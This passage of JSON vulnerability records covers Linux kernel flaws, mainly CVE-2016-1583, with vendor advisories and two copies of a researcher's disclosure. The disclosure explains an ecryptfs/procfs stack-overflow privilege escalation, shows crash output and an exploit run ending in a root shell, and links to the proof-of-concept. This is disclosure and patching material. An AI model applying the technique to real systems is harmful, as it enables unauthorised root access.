(Alexander Gordeev) [1338886 1332487]\n- [netdrv] mlx4_en: Fix endianness bug in IPV6 csum calculation (kamal heib) [1337431 1325358]\n- [acpi] srat: fix SRAT parsing order with both LAPIC and X2APIC present (Prarit Bhargava) [1336821 1331394]\n[3.10.0-327.26.1]\n- [block] blk-mq: fix race between timeout and freeing request (David Milburn) [1347743 1288601]\n- [x86] nmi: Fix use of unallocated cpumask_var_t (Jerry Snitselaar) [1346176 1069217]\n- [x86] nmi: Perform a safe NMI stack trace on all CPUs (Jerry Snitselaar) [1346176 1069217]\n- [kernel] printk: Add per_cpu printk func to allow printk to be diverted (Jerry Snitselaar) [1346176 1069217]\n- [lib] seq: Add minimal support for seq_buf (Jerry Snitselaar) [1346176 1069217]\n- [fs] ovl: use a minimal buffer in ovl_copy_xattr (Vivek Goyal) [1347235 1306358]\n- [fs] ovl: allow zero size xattr (Vivek Goyal) [1347235 1306358]\n[3.10.0-327.25.1]\n- [fs] xfs: fix broken multi-fsb buffer logging (Brian Foster) [1344234 1334671]\n[3.10.0-327.24.1]\n- [net] udp: properly support MSG_PEEK with truncated buffers (Sabrina Dubroca) [1339115 1294384]\n[3.10.0-327.23.1]\n- [net] af_unix: Guard against other == sk in unix_dgram_sendmsg (Jakub Sitnicki) [1337513 1285792]\n- [net] unix: avoid use-after-free in ep_remove_wait_queue (Paolo Abeni) [1337513 1285792]", "edition": 4, "modified": "2016-08-02T00:00:00", "published": "2016-08-02T00:00:00", "id": "ELSA-2016-1539", "href": "http://linux.oracle.com/errata/ELSA-2016-1539.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:37", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583"], "description": "kernel-uek\n[4.1.12-61.1.17]\n- sched: panic on corrupted stack end (Jann Horn) [Orabug: 24971921] {CVE-2016-1583}\n- ecryptfs: forbid opening files without mmap handler (Jann Horn) [Orabug: 24971921] {CVE-2016-1583}\n- proc: prevent stacking filesystems on top (Jann Horn) [Orabug: 24971921] {CVE-2016-1583}", "edition": 4, "modified": "2016-11-03T00:00:00", "published": "2016-11-03T00:00:00", "id": "ELSA-2016-3635", "href": "http://linux.oracle.com/errata/ELSA-2016-3635.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:19", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583"], "description": "kernel-uek\n[3.8.13-118.14.1]\n- ecryptfs: forbid opening files without mmap handler (Jann Horn) [Orabug: 24971919] {CVE-2016-1583}\n- RDS: IB: fix panic with handlers running post teardown (Santosh Shilimkar) [Orabug: 24395795] ", "edition": 4, "modified": "2016-11-03T00:00:00", "published": "2016-11-03T00:00:00", "id": "ELSA-2016-3636", "href": "http://linux.oracle.com/errata/ELSA-2016-3636.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:44:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4470", "CVE-2016-4565", "CVE-2016-5696"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A flaw was found in the Linux kernel's keyring handling code, where in key_reject_and_link() an uninitialised variable would eventually lead to arbitrary free address which could allow attacker to use a use-after-free style attack. (CVE-2016-4470, Important)\n\n* A flaw was found in the way certain interfaces of the Linux kernel's Infiniband subsystem used write() as bi-directional ioctl() replacement, which could lead to insufficient memory security checks when being invoked using the splice() system call. A local unprivileged user on a system with either Infiniband hardware present or RDMA Userspace Connection Manager Access module explicitly loaded, could use this flaw to escalate their privileges on the system. (CVE-2016-4565, Important)\n\n* A flaw was found in the implementation of the Linux kernel's handling of networking challenge ack where an attacker is able to determine the shared counter which could be used to determine sequence numbers for TCP stream injection. (CVE-2016-5696, Important)\n\nRed Hat would like to thank Jann Horn for reporting CVE-2016-4565 and Yue Cao (Cyber Security Group of the CS department of University of California in Riverside) for reporting CVE-2016-5696. The CVE-2016-4470 issue was discovered by David Howells (Red Hat Inc.).", "modified": "2016-08-23T11:54:57", "published": "2016-08-23T11:48:14", "id": "RHSA-2016:1657", "href": "https://access.redhat.com/errata/RHSA-2016:1657", "type": "redhat", "title": "(RHSA-2016:1657) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* It was found that stacking a file system over procfs in the Linux kernel could lead to a kernel stack overflow due to deep nesting, as demonstrated by mounting ecryptfs over procfs and creating a recursion by mapping /proc/environ. An unprivileged, local user could potentially use this flaw to escalate their privileges on the system. (CVE-2016-1583, Important)\n\nBug Fix(es):\n\n* Previously, while the MAP_GROWSDOWN flag was set, writing to the memory which was mapped with the mmap system call failed with the SIGBUS signal. This update fixes memory management in the Linux kernel by backporting an upstream patch that enlarges the stack guard page gap. As a result, mmap now works as expected under the described circumstances. (BZ#1474721)", "modified": "2017-09-19T11:07:12", "published": "2017-09-19T10:59:07", "id": "RHSA-2017:2760", "href": "https://access.redhat.com/errata/RHSA-2017:2760", "type": "redhat", "title": "(RHSA-2017:2760) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:40:43", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3961", "CVE-2016-5243", "CVE-2016-4470", "CVE-2016-3134"], "description": "Ben Hawkes discovered that the Linux netfilter implementation did not \ncorrectly perform validation when handling IPT_SO_SET_REPLACE events. A \nlocal unprivileged attacker could use this to cause a denial of service \n(system crash) or possibly execute arbitrary code with administrative \nprivileges. (CVE-2016-3134)\n\nVitaly Kuznetsov discovered that the Linux kernel did not properly suppress \nhugetlbfs support in X86 paravirtualized guests. An attacker in the guest \nOS could cause a denial of service (guest system crash). (CVE-2016-3961)\n\nIt was discovered that the keyring implementation in the Linux kernel did \nnot ensure a data structure was initialized before referencing it after an \nerror condition occurred. A local attacker could use this to cause a denial \nof service (system crash). (CVE-2016-4470)\n\nKangjie Lu discovered an information leak in the netlink implementation of \nthe Linux kernel. A local attacker could use this to obtain sensitive \ninformation from kernel memory. (CVE-2016-5243)", "edition": 5, "modified": "2016-08-10T00:00:00", "published": "2016-08-10T00:00:00", "id": "USN-3049-1", "href": "https://ubuntu.com/security/notices/USN-3049-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:35:04", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3961", "CVE-2016-5243", "CVE-2016-4470", "CVE-2016-3134"], "description": "Ben Hawkes discovered that the Linux netfilter implementation did not \ncorrectly perform validation when handling IPT_SO_SET_REPLACE events. A \nlocal unprivileged attacker could use this to cause a denial of service \n(system crash) or possibly execute arbitrary code with administrative \nprivileges. (CVE-2016-3134)\n\nVitaly Kuznetsov discovered that the Linux kernel did not properly suppress \nhugetlbfs support in X86 paravirtualized guests. An attacker in the guest \nOS could cause a denial of service (guest system crash). (CVE-2016-3961)\n\nIt was discovered that the keyring implementation in the Linux kernel did \nnot ensure a data structure was initialized before referencing it after an \nerror condition occurred. A local attacker could use this to cause a denial \nof service (system crash). (CVE-2016-4470)\n\nKangjie Lu discovered an information leak in the netlink implementation of \nthe Linux kernel. A local attacker could use this to obtain sensitive \ninformation from kernel memory. (CVE-2016-5243)", "edition": 5, "modified": "2016-08-10T00:00:00", "published": "2016-08-10T00:00:00", "id": "USN-3050-1", "href": "https://ubuntu.com/security/notices/USN-3050-1", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:37:55", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583"], "description": "Jann Horn discovered that eCryptfs improperly attempted to use the mmap() \nhandler of a lower filesystem that did not implement one, causing a \nrecursive page fault to occur. A local unprivileged attacker could use to \ncause a denial of service (system crash) or possibly execute arbitrary code \nwith administrative privileges.", "edition": 5, "modified": "2016-06-10T00:00:00", "published": "2016-06-10T00:00:00", "id": "USN-3008-1", "href": "https://ubuntu.com/security/notices/USN-3008-1", "title": "Linux kernel (Qualcomm Snapdragon) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:34:18", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583"], "description": "Jann Horn discovered that eCryptfs improperly attempted to use the mmap() \nhandler of a lower filesystem that did not implement one, causing a \nrecursive page fault to occur. A local unprivileged attacker could use to \ncause a denial of service (system crash) or possibly execute arbitrary code \nwith administrative privileges.", "edition": 5, "modified": "2016-06-10T00:00:00", "published": "2016-06-10T00:00:00", "id": "USN-2999-1", "href": "https://ubuntu.com/security/notices/USN-2999-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583", "CVE-2016-4470", "CVE-2016-4997", "CVE-2016-4998"], "description": "The kernel meta package ", "modified": "2016-07-19T07:20:52", "published": "2016-07-19T07:20:52", "id": "FEDORA:EE2EE6087A58", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: kernel-4.4.14-200.fc22", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583", "CVE-2016-4470", "CVE-2016-4997", "CVE-2016-4998", "CVE-2016-5728"], "description": "The kernel meta package ", "modified": "2016-06-30T21:30:47", "published": "2016-06-30T21:30:47", "id": "FEDORA:F325C6013F0A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: kernel-4.6.3-300.fc24", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1237", "CVE-2016-1583", "CVE-2016-4470", "CVE-2016-4998", "CVE-2016-5728", "CVE-2016-5829"], "description": "The kernel meta package ", "modified": "2016-07-02T19:33:02", "published": "2016-07-02T19:33:02", "id": "FEDORA:4F34C605E513", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: kernel-4.5.7-202.fc23", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-06-21T17:03:06", "description": "Linux - ecryptfs and /proc/$pid/environ Privilege Escalation. CVE-2016-1583. Local exploit for linux platform", "published": "2016-06-21T00:00:00", "type": "exploitdb", "title": "Linux - ecryptfs and /proc/$pid/environ Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-1583"], "modified": "2016-06-21T00:00:00", "id": "EDB-ID:39992", "href": "https://www.exploit-db.com/exploits/39992/", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=836\r\n\r\nStacking filesystems, including ecryptfs, protect themselves against\r\ndeep nesting, which would lead to kernel stack overflow, by tracking\r\nthe recursion depth of filesystems. E.g. in ecryptfs, this is\r\nimplemented in ecryptfs_mount() as follows:\r\n\r\n\ts->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;\r\n\r\n\trc = -EINVAL;\r\n\tif (s->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {\r\n\t\tpr_err(\"eCryptfs: maximum fs stacking depth exceeded\\n\");\r\n\t\tgoto out_free;\r\n\t}\r\n\r\n\r\nThe files /proc/$pid/{mem,environ,cmdline}, when read, access the\r\nuserspace memory of the target process, involving, if necessary,\r\nnormal pagefault handling. If it was possible to mmap() them, an\r\nattacker could create a chain of e.g. /proc/$pid/environ mappings\r\nwhere process 1 has /proc/2/environ mapped into its environment area,\r\nprocess 2 has /proc/3/environ mapped into its environment area and so\r\non. A read from /proc/1/environ would invoke the pagefault handler for\r\nprocess 1, which would invoke the pagefault handler for process 2 and\r\nso on. This would, again, lead to kernel stack overflow.\r\n\r\n\r\nOne interesting fact about ecryptfs is that, because of the encryption\r\ninvolved, it doesn't just forward mmap to the lower file's mmap\r\noperation. Instead, it has its own page cache, maintained using the\r\nnormal filemap helpers, and performs its cryptographic operations when\r\ndirty pages need to be written out or when pages need to be faulted\r\nin. Therefore, not just its read and write handlers, but also its mmap\r\nhandler only uses the lower filesystem's read and write methods.\r\nThis means that using ecryptfs, you can mmap [decrypted views of]\r\nfiles that normally wouldn't be mappable.\r\n\r\nCombining these things, it is possible to trigger recursion with\r\narbitrary depth where:\r\n\r\na reading userspace memory access in process A (from userland or from\r\n copy_from_user())\r\ncauses a pagefault in an ecryptfs mapping in process A, which\r\ncauses a read from /proc/{B}/environ, which\r\ncauses a pagefault in an ecryptfs mapping in process B, which\r\ncauses a read from /proc/{C}/environ, which\r\ncauses a pagefault in an ecryptfs mapping in process C, and so on.\r\n\r\nOn systems with the /sbin/mount.ecryptfs_private helper installed\r\n(e.g. Ubuntu if the \"encrypt my home directory\" checkbox is ticked\r\nduring installation), this bug can be triggered by an unprivileged\r\nuser. The mount helper considers /proc/$pid, where $pid is the PID of\r\na process owned by the user, to be a valid mount source because the\r\ndirectory is \"owned\" by the user.\r\n\r\nI have attached both a generic crash PoC and a build-specific exploit\r\nthat can be used to gain root privileges from a normal user account on\r\nUbuntu 16.04 with kernel package linux-image-4.4.0-22-generic, version\r\n4.4.0-22.40, uname \"Linux user-VirtualBox 4.4.0-22-generic #40-Ubuntu\r\nSMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\".\r\n\r\ndmesg output of the crasher:\r\n\r\n```\r\n[ 80.036069] BUG: unable to handle kernel paging request at fffffffe4b9145c0\r\n[ 80.040028] IP: [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40\r\n[ 80.040028] PGD 1e0d067 PUD 0 \r\n[ 80.040028] Thread overran stack, or stack corrupted\r\n[ 80.040028] Oops: 0000 [#1] SMP \r\n[ 80.040028] Modules linked in: vboxsf drbg ansi_cprng xts gf128mul dm_crypt snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi vboxvideo snd_seq ttm snd_seq_device drm_kms_helper snd_timer joydev drm snd fb_sys_fops soundcore syscopyarea sysfillrect sysimgblt vboxguest input_leds i2c_piix4 8250_fintek mac_hid serio_raw parport_pc ppdev lp parport autofs4 hid_generic usbhid hid psmouse ahci libahci e1000 pata_acpi fjes video\r\n[ 80.040028] CPU: 0 PID: 2135 Comm: crasher Not tainted 4.4.0-22-generic #40-Ubuntu\r\n[ 80.040028] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006\r\n[ 80.040028] task: ffff880035443200 ti: ffff8800d933c000 task.ti: ffff8800d933c000\r\n[ 80.040028] RIP: 0010:[<ffffffff810c9a33>] [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40\r\n[ 80.040028] RSP: 0000:ffff88021fc03d70 EFLAGS: 00010046\r\n[ 80.040028] RAX: 000000000000dc68 RBX: ffff880035443260 RCX: ffffffffd933c068\r\n[ 80.040028] RDX: ffffffff81e50560 RSI: 000000000013877a RDI: ffff880035443200\r\n[ 80.040028] RBP: ffff88021fc03d70 R08: 0000000000000000 R09: 0000000000010000\r\n[ 80.040028] R10: 0000000000002d4e R11: 00000000000010ae R12: ffff8802137aa200\r\n[ 80.040028] R13: 000000000013877a R14: ffff880035443200 R15: ffff88021fc0ee68\r\n[ 80.040028] FS: 00007fbd9fadd700(0000) GS:ffff88021fc00000(0000) knlGS:0000000000000000\r\n[ 80.040028] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 80.040028] CR2: fffffffe4b9145c0 CR3: 0000000035415000 CR4: 00000000000006f0\r\n[ 80.040028] Stack:\r\n[ 80.040028] ffff88021fc03db0 ffffffff810b4b83 0000000000016d00 ffff88021fc16d00\r\n[ 80.040028] ffff880035443260 ffff8802137aa200 0000000000000000 ffff88021fc0ee68\r\n[ 80.040028] ffff88021fc03e30 ffffffff810bb414 ffff88021fc03dd0 ffff880035443200\r\n[ 80.040028] Call Trace:\r\n[ 80.040028] <IRQ> \r\n[ 80.040028] [<ffffffff810b4b83>] update_curr+0xe3/0x160\r\n[ 80.040028] [<ffffffff810bb414>] task_tick_fair+0x44/0x8e0\r\n[ 80.040028] [<ffffffff810b1267>] ? sched_clock_local+0x17/0x80\r\n[ 80.040028] [<ffffffff810b146f>] ? sched_clock_cpu+0x7f/0xa0\r\n[ 80.040028] [<ffffffff810ad35c>] scheduler_tick+0x5c/0xd0\r\n[ 80.040028] [<ffffffff810fe560>] ? tick_sched_handle.isra.14+0x60/0x60\r\n[ 80.040028] [<ffffffff810ee961>] update_process_times+0x51/0x60\r\n[ 80.040028] [<ffffffff810fe525>] tick_sched_handle.isra.14+0x25/0x60\r\n[ 80.040028] [<ffffffff810fe59d>] tick_sched_timer+0x3d/0x70\r\n[ 80.040028] [<ffffffff810ef282>] __hrtimer_run_queues+0x102/0x290\r\n[ 80.040028] [<ffffffff810efa48>] hrtimer_interrupt+0xa8/0x1a0\r\n[ 80.040028] [<ffffffff81052fa8>] local_apic_timer_interrupt+0x38/0x60\r\n[ 80.040028] [<ffffffff81827d9d>] smp_apic_timer_interrupt+0x3d/0x50\r\n[ 80.040028] [<ffffffff81826062>] apic_timer_interrupt+0x82/0x90\r\n[ 80.040028] <EOI> \r\n[ 80.040028] Code: 0f 1f 84 00 00 00 00 00 66 66 66 66 90 48 8b 47 08 48 8b 97 78 07 00 00 55 48 63 48 10 48 8b 52 60 48 89 e5 48 8b 82 b8 00 00 00 <48> 03 04 cd 80 42 f3 81 48 01 30 48 8b 52 48 48 85 d2 75 e5 5d \r\n[ 80.040028] RIP [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40\r\n[ 80.040028] RSP <ffff88021fc03d70>\r\n[ 80.040028] CR2: fffffffe4b9145c0\r\n[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16\r\n[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16\r\n[ 80.040028] ---[ end trace 616e3de50958c35b ]---\r\n[ 80.040028] Kernel panic - not syncing: Fatal exception in interrupt\r\n[ 80.040028] Shutting down cpus with NMI\r\n[ 80.040028] Kernel Offset: disabled\r\n[ 80.040028] ---[ end Kernel panic - not syncing: Fatal exception in interrupt\r\n```\r\n\r\nexample run of the exploit, in a VM with 4 cores, with Ubuntu 16.04 installed:\r\n\r\n```\r\nuser@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls\r\ncompile.sh exploit.c hello.c suidhelper.c\r\nuser@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./compile.sh \r\nuser@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls\r\ncompile.sh exploit exploit.c hello hello.c suidhelper suidhelper.c\r\nuser@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./exploit\r\nall spammers ready\r\nrecurser parent ready\r\nspam over\r\nfault chain set up, faulting now\r\nwriting stackframes\r\nstackframes written\r\nkilling 2494\r\npost-corruption code is alive!\r\nchildren should be dead\r\ncoredump handler set. recurser exiting.\r\ngoing to crash now\r\nsuid file detected, launching rootshell...\r\nwe have root privs now...\r\nroot@user-VirtualBox:/proc# id\r\nuid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)\r\n```\r\n\r\n(If the exploit crashes even with the right kernel version, try\r\nrestarting the machine. Also, ensure that no program like top/htop/...\r\nis running that might try to read process command lines. Note that\r\nthe PoC and the exploit don't really clean up after themselves and\r\nleave mountpoints behind that prevent them from re-running without\r\na reboot or manual unmounting.)\r\n\r\nNote that Ubuntu compiled their kernel with\r\nCONFIG_SCHED_STACK_END_CHECK turned on, making it harder than it used\r\nto be in the past to not crash the kernel while exploiting this bug,\r\nand an overwrite of addr_limit would be useless because at the\r\ntime the thread_info is overwritten, there are multiple instances of\r\nkernel_read() on the stack. Still, the bug is exploitable by carefully\r\naligning the stack so that the vital components of thread_info are\r\npreserved, stopping with an out-of-bounds stack pointer and\r\noverwriting the thread stack using a normal write to an adjacent\r\nallocation of the buddy allocator.\r\n\r\nRegarding the fix, I think the following would be reasonable:\r\n\r\n - Explicitly forbid stacking anything on top of procfs by setting its\r\n s_stack_depth to a sufficiently large value. In my opinion, there\r\n is too much magic going on inside procfs to allow stacking things\r\n on top of it, and there isn't any good reason to do it. (For\r\n example, ecryptfs invokes open handlers from a kernel thread\r\n instead of normal user process context, so the access checks inside\r\n VFS open handlers are probably ineffective - and procfs relies\r\n heavily on those.)\r\n\r\n - Forbid opening files with f_op->mmap==NULL through ecryptfs. If the\r\n lower filesystem doesn't expect to be called in pagefault-handling\r\n context, it probably shouldn't be called in that context.\r\n\r\n - Create a dedicated kernel stack cache outside of the direct mapping\r\n of physical memory that has a guard page (or a multi-page gap) at\r\n the bottom of each stack, and move the struct thread_info to a\r\n different place (if nothing else works, the top of the stack, above\r\n the pt_regs).\r\n While e.g. race conditions are more common than stack overflows in\r\n the Linux kernel, the whole vulnerability class of stack overflows\r\n is easy to mitigate, and the kernel is sufficiently complicated for\r\n unbounded recursion to emerge in unexpected places - or perhaps\r\n even for someone to discover a way to create a stack with a bounded\r\n length that is still too high. Therefore, I believe that guard\r\n pages are a useful mitigation.\r\n Nearly everywhere, stack overflows are caught using guard pages\r\n nowadays; this includes Linux userland, but also {### TODO ###}\r\n and, on 64-bit systems, grsecurity (using GRKERNSEC_KSTACKOVERFLOW).\r\n\r\nOh, and by the way: The `BUG_ON(task_stack_end_corrupted(prev))`\r\nin schedule_debug() ought to be a direct panic instead of an oops. At\r\nthe moment, when you hit it, you get a recursion between the scheduler\r\ninvocation in do_exit() and the BUG_ON in the scheduler, and the\r\nkernel recurses down the stack until it hits something sufficiently\r\nimportant to cause a panic.\r\n\r\nI'm going to send (compile-tested) patches for my first two fix\r\nsuggestions and the recursive oops bug. I haven't written a patch for\r\nthe guard pages mitigation - I'm not familiar enough with the x86\r\nsubsystem for that.\r\n\r\n\r\nNotes regarding the exploit:\r\n\r\nIt makes an invalid assumption that causes it to require at least around 6GB of RAM.\r\n\r\nIt has a trivially avoidable race that causes it to fail on single-core systems after overwriting the coredump handler; if this happens, it's still possible to manually trigger a coredump and execute the suid helper to get a root shell.\r\n\r\nThe page spraying is pretty primitive and racy; while it works reliably for me, there might be influencing factors that cause it to fail on other people's machines.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39992.zip\r\n\r\n", "cvss": {"score": 7.3, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:HIGH/I:HIGH/A:HIGH/"}, "sourceHref": "https://www.exploit-db.com/download/39992/"}], "zdt": [{"lastseen": "2018-03-19T05:21:05", "edition": 2, "description": "Exploit for linux platform in category local exploits", "published": "2016-06-21T00:00:00", "type": "zdt", "title": "Linux - ecryptfs and /proc/$pid/environ Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-1583"], "modified": "2016-06-21T00:00:00", "id": "1337DAY-ID-25603", "href": "https://0day.today/exploit/description/25603", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=836\r\n \r\nStacking filesystems, including ecryptfs, protect themselves against\r\ndeep nesting, which would lead to kernel stack overflow, by tracking\r\nthe recursion depth of filesystems. E.g. in ecryptfs, this is\r\nimplemented in ecryptfs_mount() as follows:\r\n \r\n s->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;\r\n \r\n rc = -EINVAL;\r\n if (s->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {\r\n pr_err(\"eCryptfs: maximum fs stacking depth exceeded\\n\");\r\n goto out_free;\r\n }\r\n \r\n \r\nThe files /proc/$pid/{mem,environ,cmdline}, when read, access the\r\nuserspace memory of the target process, involving, if necessary,\r\nnormal pagefault handling. If it was possible to mmap() them, an\r\nattacker could create a chain of e.g. /proc/$pid/environ mappings\r\nwhere process 1 has /proc/2/environ mapped into its environment area,\r\nprocess 2 has /proc/3/environ mapped into its environment area and so\r\non. A read from /proc/1/environ would invoke the pagefault handler for\r\nprocess 1, which would invoke the pagefault handler for process 2 and\r\nso on. This would, again, lead to kernel stack overflow.\r\n \r\n \r\nOne interesting fact about ecryptfs is that, because of the encryption\r\ninvolved, it doesn't just forward mmap to the lower file's mmap\r\noperation. Instead, it has its own page cache, maintained using the\r\nnormal filemap helpers, and performs its cryptographic operations when\r\ndirty pages need to be written out or when pages need to be faulted\r\nin. Therefore, not just its read and write handlers, but also its mmap\r\nhandler only uses the lower filesystem's read and write methods.\r\nThis means that using ecryptfs, you can mmap [decrypted views of]\r\nfiles that normally wouldn't be mappable.\r\n \r\nCombining these things, it is possible to trigger recursion with\r\narbitrary depth where:\r\n \r\na reading userspace memory access in process A (from userland or from\r\n copy_from_user())\r\ncauses a pagefault in an ecryptfs mapping in process A, which\r\ncauses a read from /proc/{B}/environ, which\r\ncauses a pagefault in an ecryptfs mapping in process B, which\r\ncauses a read from /proc/{C}/environ, which\r\ncauses a pagefault in an ecryptfs mapping in process C, and so on.\r\n \r\nOn systems with the /sbin/mount.ecryptfs_private helper installed\r\n(e.g. Ubuntu if the \"encrypt my home directory\" checkbox is ticked\r\nduring installation), this bug can be triggered by an unprivileged\r\nuser. The mount helper considers /proc/$pid, where $pid is the PID of\r\na process owned by the user, to be a valid mount source because the\r\ndirectory is \"owned\" by the user.\r\n \r\nI have attached both a generic crash PoC and a build-specific exploit\r\nthat can be used to gain root privileges from a normal user account on\r\nUbuntu 16.04 with kernel package linux-image-4.4.0-22-generic, version\r\n4.4.0-22.40, uname \"Linux user-VirtualBox 4.4.0-22-generic #40-Ubuntu\r\nSMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\".\r\n \r\ndmesg output of the crasher:\r\n \r\n```\r\n[ 80.036069] BUG: unable to handle kernel paging request at fffffffe4b9145c0\r\n[ 80.040028] IP: [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40\r\n[ 80.040028] PGD 1e0d067 PUD 0 \r\n[ 80.040028] Thread overran stack, or stack corrupted\r\n[ 80.040028] Oops: 0000 [#1] SMP \r\n[ 80.040028] Modules linked in: vboxsf drbg ansi_cprng xts gf128mul dm_crypt snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi vboxvideo snd_seq ttm snd_seq_device drm_kms_helper snd_timer joydev drm snd fb_sys_fops soundcore syscopyarea sysfillrect sysimgblt vboxguest input_leds i2c_piix4 8250_fintek mac_hid serio_raw parport_pc ppdev lp parport autofs4 hid_generic usbhid hid psmouse ahci libahci e1000 pata_acpi fjes video\r\n[ 80.040028] CPU: 0 PID: 2135 Comm: crasher Not tainted 4.4.0-22-generic #40-Ubuntu\r\n[ 80.040028] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006\r\n[ 80.040028] task: ffff880035443200 ti: ffff8800d933c000 task.ti: ffff8800d933c000\r\n[ 80.040028] RIP: 0010:[<ffffffff810c9a33>] [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40\r\n[ 80.040028] RSP: 0000:ffff88021fc03d70 EFLAGS: 00010046\r\n[ 80.040028] RAX: 000000000000dc68 RBX: ffff880035443260 RCX: ffffffffd933c068\r\n[ 80.040028] RDX: ffffffff81e50560 RSI: 000000000013877a RDI: ffff880035443200\r\n[ 80.040028] RBP: ffff88021fc03d70 R08: 0000000000000000 R09: 0000000000010000\r\n[ 80.040028] R10: 0000000000002d4e R11: 00000000000010ae R12: ffff8802137aa200\r\n[ 80.040028] R13: 000000000013877a R14: ffff880035443200 R15: ffff88021fc0ee68\r\n[ 80.040028] FS: 00007fbd9fadd700(0000) GS:ffff88021fc00000(0000) knlGS:0000000000000000\r\n[ 80.040028] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 80.040028] CR2: fffffffe4b9145c0 CR3: 0000000035415000 CR4: 00000000000006f0\r\n[ 80.040028] Stack:\r\n[ 80.040028] ffff88021fc03db0 ffffffff810b4b83 0000000000016d00 ffff88021fc16d00\r\n[ 80.040028] ffff880035443260 ffff8802137aa200 0000000000000000 ffff88021fc0ee68\r\n[ 80.040028] ffff88021fc03e30 ffffffff810bb414 ffff88021fc03dd0 ffff880035443200\r\n[ 80.040028] Call Trace:\r\n[ 80.040028] <IRQ> \r\n[ 80.040028] [<ffffffff810b4b83>] update_curr+0xe3/0x160\r\n[ 80.040028] [<ffffffff810bb414>] task_tick_fair+0x44/0x8e0\r\n[ 80.040028] [<ffffffff810b1267>] ? sched_clock_local+0x17/0x80\r\n[ 80.040028] [<ffffffff810b146f>] ? 